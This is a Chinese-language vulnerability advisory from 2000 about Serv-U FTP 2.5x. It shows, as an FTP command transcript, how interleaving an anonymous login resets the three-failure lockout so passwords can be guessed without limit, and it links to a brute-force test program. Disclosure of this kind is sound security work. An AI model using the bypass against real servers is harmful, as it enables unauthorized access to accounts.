CatSoft FTP Serv-U存在暴力破解漏洞发布时间:2000-10-31 更新时间:2000-10-31 严重程度:中 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 Cat Soft Serv-U 2.5x详细描述 FTP SERV-U是一个FTP服务程序,FTP SERV-U存在一个反暴力破解安全措施, 就是不指示这个用户是不是合法,只要在三次不成功LOGIN后,就断开连接, 但现在发现一个远程用户可以旁路反暴力破解功能。 USER USER1 >331 User name okay, need password. PASS PASSWORD >530 Not logged in. USER USER1 >331 User name okay, need password. PASS nextpassPASSWORD >530 Not logged in. USER anonymous >331 User name okay, please send complete E-mail address as password. PASS somemail@address.com >230 User logged in, proceed. USER USERNAME >331 User name okay, need password. PASS 3rdPASSWORD >530 Not logged in. USER USERNAME >331 User name okay, need password. PASS 4thPASSWORD >530 Not logged in. .... .... 测试代码 可下载下面的测试代码: http://www.securityfocus.com/data/vulnerabilities/exploits/newftpbrute.java 解决方案 尚无 相关信息 |
